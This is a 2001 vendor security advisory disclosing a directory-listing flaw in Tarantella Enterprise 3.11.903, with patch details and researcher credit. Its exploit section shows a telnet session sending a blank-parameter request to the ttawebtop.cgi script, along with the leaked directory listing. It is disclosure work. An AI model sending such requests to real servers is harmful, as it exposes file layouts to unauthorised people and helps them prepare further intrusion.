ISSTW Security Advisory (ISSTW200201) Tarantella Enterprise 3.11.903 Directory Index Disclosure Vulnerability Discovery Date: Fri, 21 Dec 2001 ---------------------------------------------------------------------- Overview: --------- ISSTW Tiger-Force discovered a vulnerability in Tarantella Enterprise 3 that will reveal directory content with the use of blank parameter. Problem Description: -------------------- Tarantella Enterprise 3 is a non-intrusive application/data centralization solution. End users can access enterprise resources via the web interface. The vulnerability will allow a malicious user to review the directory content. Exploit: -------- shell$ telnet tarantella.somewhere.com 80 Trying 12.34.56.78... Connected to 12.34.56.78. Escape character is '^]'. GET /cgi-bin/ttawebtop.cgi/?action=start&pg= HTTP/1.0 HTTP/1.1 200 OK Date: Fri, 21 Dec 2001 11:34:39 GMT Server: Apache/1.3.4 (Unix) Content-length: 512 Connection: close Content-Type: text/html ?C . ¨º .. 4 cgi-bin ?E direct.html on examples ? help ?Y index.html ?Z index2.html ?[ kiosk.html ?\ kiosk2.html ?] loader.html % mac -v resources native 5 java ?w index2.html.orig ›o modules Îb tsp les x resources.3_11.tar ,w resources.old Tested Platform: --------------- Tarantella Enterprise 3.11.903 Tested OS: ---------- Solaris 7 (Sparc) Patch Information: ------------------ http://www.tarantella.com/security/bulletin-03.html Credit: ------- This vulnerability was discovered and researched by Chieh-Chun Lin (cclin@iss.com.tw) Disclaimer: All information in these advisories are subject to change without any advanced notices neither mutual consensus, and each of them is released as it is. ISSTW. is not responsible for any risks of occurrences caused by applying those information.
